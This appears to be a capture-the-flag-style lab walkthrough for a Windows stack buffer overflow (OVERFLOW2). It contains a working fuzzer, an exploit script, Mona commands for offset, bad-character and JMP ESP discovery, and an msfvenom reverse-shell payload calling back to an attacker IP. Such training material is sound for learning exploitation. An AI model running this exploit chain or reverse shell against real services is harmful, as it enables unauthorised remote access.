Configure Mona
- Prepare our environment and temp folder
Crash the application
- We will use a standard fuzzing script for this that will pass different buffer sizes.
Find the exact off set of the crash
- Find the particular memory address the crash occurred (data lands outside the buffer here and fills EIP with Junk)
Find Bad Characters
- Find and test character array to remove bad characters
Control EIP
- Fill the EIP register with custom input
Find JMP address
- Find a memory address with a jmp retn instruction we can control
Payload Generation
Configure Mona
Here we set out temporary folder within mona which will store a byte array for us at the later stage of this process.
!mona config -set workingfolder c:\mona\%p
Crash the application
We start off as usual with a standard windows binary fuzzing script and set the ip and port variables to the target server running the vulnerable service. In this case the binary is titled "OVERFLOW2".
python3 fuzzer.py
#!/usr/bin/env python3
import socket, time, sys
ip = "10.10.191.67"
port = 1337
timeout = 5
prefix = "OVERFLOW2 "
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
except:
print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)
Run the python scrip
oot@ip-10-10-58-73:~# python3 fuzz.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing with 700 bytes
Fuzzing crashed at 700 bytes
We have a crash at 700 bytes of data passed into the buffer. This tells us the application is vulnerable to a buffer overflow.
Find the exact off set of the crash
First we setup a standard skeleton script for a buffer overflow exploit, to send data and call the shell.
import socket
ip = "10.10.44.191"
port = 1337
prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
The next step is to create a character pattern. Pass the pattern of characters into the payload field of the exploit, restart OSCP in immunity and run the exploit.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1100
This offset value will be displayed in the EIP register and we will add this to our exploit script under "offset".
Find bad characters
We will generate an array of all possible bytes in mona and redirect this to the temporary file we configured.
!mona bytearray -b "\x00"
From here we generate a large byte array in the terminal that we can copy into the exploit under "payload"
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()
!mona compare -f C:\mona\oscp\bytearray.bin -a 01A2FA30
Im going to guess every second character and see if I can skip this manual process. Often when a bad character is flagged it will result in the next byte pair being associated and flagged. So every second byte pair is likely our bad character.
The selected bad cahracters are
00 23 3c 83 ba
\x00\xba\x83\x3c\x23
Control EIP
We need to test EIP by placing BBBB in the return address of the script which will be called after the buffer overflow ending at offset 634.
Find JMP
We will use the following command in mona to look for all jump esp instructions. Make sure to specify all bad instructions. Choose any of these of the jump points
!mona jmp -r esp -cpb "\x00\xba\x83\x3c\x23"
From here we look at the Log view and see several memory addresses with the jmp instruction.
0x625011af
Reverse this address to fit little Endian
\xaf\x11\x50\x62
Set return address
Taking the jmp esp address we insert this into the exploit as the retn address.
The address must be translated to little endian however.
\xaf\x11\x50\x62
Payload generation
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.7.68 LPORT=4444 EXITFUNC=thread -b "\x00\xba\x83\x3c\x23" -f c
We add the shell code to our payload to replace the bad char array.
Launching the exploit gets us shell!
Commenti